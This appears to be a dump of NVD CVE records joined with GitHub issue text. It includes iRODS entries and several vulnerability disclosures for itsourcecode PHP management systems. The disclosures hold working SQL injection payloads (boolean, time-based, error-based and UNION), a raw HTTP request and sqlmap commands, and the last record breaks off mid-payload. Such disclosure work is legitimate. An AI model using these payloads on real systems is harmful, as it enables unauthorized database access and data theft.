src="https://github.com/chenwulin-bit/cve/assets/172822200/59449a54-d9b2-4302-9203-fc60bc9fd59a"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Laundry Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /ajax.php?action=save_user HTTP/1.1 Host: 192.168.1.136:1215 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 62 Origin: http://192.168.1.136:1215 Connection: close Referer: http://192.168.1.136:1215/index.php?page=users Cookie: PHPSESSID=rfkglhgunub3dub22riq796k7j; pma_lang=zh_CN; phpMyAdmin=ujrjcboafog9dlu1gdvde2h12k; pmaUser-1=%7B%22iv%22%3A%22vK4EAyr9VLsT3SeOUwZUIw%3D%3D%22%2C%22mac%22%3A%2268eccff8dac32025157f35833e5b8871300b0bc6%22%2C%22payload%22%3A%22Q7C3Smm%2BfZKGX%2BXNQgbuWA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22s2zrXn936ONY3MbdOHfxvA%3D%3D%22%2C%22mac%22%3A%226b376c3eee69bfaecc9058af2d8e98e0758d1d9a%22%2C%22payload%22%3A%22Pga6jrC2TLPgsCis%5C%2FvquwEPKjbO40AEpBValSJIcQAM%3D%22%7D Priority: u=1 name=admin123&username=admin111&password=admin123&type=1&id='' ``` ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'id' parameter ## Payload: Parameter: id (POST) ``` Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (8108=8108) THEN '' ELSE (SELECT 4193 UNION SELECT 7658) END))&name=admin123&username=admin111&password=admin123&type=1 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: id=(SELECT 9119 FROM (SELECT(SLEEP(5)))uzyR)&name=admin123&username=admin111&password=admin123&type=1 ``` <img width="645" alt="2" src="https://github.com/chenwulin-bit/cve/assets/172822200/679b6696-2ac9-4e6a-b401-ff5b3af4918b"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="527" alt="3" src="https://github.com/chenwulin-bit/cve/assets/172822200/8b9fec58-fb15-4cfd-bd34-55a4a20d5a65"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection
https://api.github.com/repos/chenwulin-bit/cve/issues/2/comments
0
2024-06-14T14:46:54Z
2024-06-14T14:46:54Z
https://github.com/chenwulin-bit/cve/issues/2
2,353,539,007
2
6,076
CVE-2024-38461
2024-06-16T16:15:09.537
irodsServerMonPerf in iRODS before 4.3.2 attempts to proceed with use of a path even if it is not a directory.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7652" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/irods/irods/releases/tag/4.3.2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7652" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/irods/irods/releases/tag/4.3.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*", "matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B", "versionEndExcluding": "4.3.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/irods/irods/issues/7652
[ "Issue Tracking" ]
github.com
[ "irods", "irods" ]
- [x] main - [x] 4-3-stable
irodsServerMonPerf doesn't check for bad paths
https://api.github.com/repos/irods/irods/issues/7652/comments
0
2024-04-09T16:54:32Z
2024-04-09T17:39:54Z
https://github.com/irods/irods/issues/7652
2,233,889,252
7,652
6,077
CVE-2024-38462
2024-06-16T16:15:09.627
iRODS before 4.3.2 provides an msiSendMail function with a problematic dependency on the mail binary, such as in the mailMS.cpp#L94-L106 reference.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7562" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/irods/irods/issues/7651" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/irods/irods/issues/7651" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*", "matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B", "versionEndExcluding": "4.3.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "426" ]
426
https://github.com/irods/irods/issues/7562
[ "Issue Tracking" ]
github.com
[ "irods", "irods" ]
- [x] main - [x] 4-3-stable --- ## Deprecation `msiSendMail` provides very basic functionality for sending email. iRODS exposes mechanisms for building much better email-related tools (e.g. `msiExecCmd` and Python). This microservice also adds an unnecessary dependency on the `mail` binary. With that said, `msiSendMail` should be deprecated.
Deprecate `msiSendMail`
https://api.github.com/repos/irods/irods/issues/7562/comments
0
2024-03-14T15:54:03Z
2024-03-18T16:22:03Z
https://github.com/irods/irods/issues/7562
2,186,719,768
7,562
6,078
CVE-2024-38462
2024-06-16T16:15:09.627
iRODS before 4.3.2 provides an msiSendMail function with a problematic dependency on the mail binary, such as in the mailMS.cpp#L94-L106 reference.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7562" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/irods/irods/issues/7651" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/irods/irods/issues/7562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/irods/irods/issues/7651" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://irods.org/2024/05/irods-4-3-2-is-released/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*", "matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B", "versionEndExcluding": "4.3.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "426" ]
426
https://github.com/irods/irods/issues/7651
[ "Issue Tracking", "Patch" ]
github.com
[ "irods", "irods" ]
- [x] 4-3-stable - [x] irods/irods_docs ## Deprecation - Add private variable for controlling whether `msiSendMail` returns early - Add new MSI for changing the value of the variable - Requires rodsadmin privileges - Potential names for the MSI - `msi_use_deprecated_msiSendMail` - `msi_allow_deprecated_msiSendMail` - `msi_enable_deprecated_msiSendMail` - `msiSendMail` checks private variable before sending any mail - Consider whether use of `msiSendMail` should reset the private variable
Make `msiSendMail` opt-in
https://api.github.com/repos/irods/irods/issues/7651/comments
1
2024-04-09T16:45:59Z
2024-04-11T19:08:52Z
https://github.com/irods/irods/issues/7651
2,233,875,219
7,651
6,079
CVE-2024-6041
2024-06-16T23:15:49.417
A vulnerability was found in itsourcecode Gym Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268765 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ssiicckk/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.268765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.357816" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ssiicckk/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268765" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.268765" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.357816" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:admerc:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "959641DE-44CC-4870-AEDF-5E73A4BC5687", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ssiicckk/cve/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "ssiicckk", "cve" ]
# Itsourcecode Gym Management System Project In PHP With Source Code v1.0 manage_user.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Gym Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/gym-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + siiiiiick ## Vulnerable File + manage_user.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Gym-Management-System-Project-in-PHP.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Gym Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="929" alt="1" src="https://github.com/ssiicckk/cve/assets/91513500/5d063b8b-2ce3-426e-9743-42284125cfd6"> ## Impact + Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Gym Management System Project In PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'id' parameter ## Payload: <img width="929" alt="1" src="https://github.com/ssiicckk/cve/assets/91513500/0e210873-0e7d-4f3b-b74a-337723367d3d"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "192.168.210.199:1221//manage_user.php?id=2&mtype=own" --batch --dbs ``` <img width="526" alt="3" src="https://github.com/ssiicckk/cve/assets/91513500/8f59575a-1c73-4812-b031-eac0da0da2b5"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Gym Management System Project In PHP With Source Code v1.0 manage_user.php SQL injection
https://api.github.com/repos/ssiicckk/cve/issues/1/comments
0
2024-06-15T08:19:54Z
2024-06-15T08:19:54Z
https://github.com/ssiicckk/cve/issues/1
2,354,643,688
1
6,080
CVE-2024-6042
2024-06-17T00:15:09.323
A vulnerability was found in itsourcecode Real Estate Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file property-detail.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268766 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Cormac315/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.268766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.357851" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Cormac315/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.268766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.357851" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:real_estate_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "89CC775B-6E0F-474F-AE02-7D933814C0ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cormac315/cve/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "Cormac315", "cve" ]
# Itsourcecode Real Estate Management System Project In PHP v1.0 property-detail.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Real Estate Management System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/real-estate-management-system-project-in-php-free-download/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Cormac ## Vulnerable File + property-detail.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/Real-Estate-Management-System-Project-In-PHP-Free-Download-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'property-detail.php' file of the 'Real Estate Management System Project In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="791" alt="1" src="https://github.com/Cormac315/cve/assets/129538275/bf540966-8264-4ebf-905b-4d2b52ed93d1"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "id" parameter, a serious SQL injection vulnerability has been discovered in the property viewing function of the "Real Estate Management System Project in PHP". Attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + UNION query + error-based ## Vulnerability location: + 'id' parameter ## Payload: ``` Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4821=4821 AND 'FQYX'='FQYX Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7545 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(7545=7545,1))),0x7176626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RXQu'='RXQu Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 6805 FROM (SELECT(SLEEP(5)))ThjU) AND 'KdMQ'='KdMQ Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=1' UNION ALL SELECT 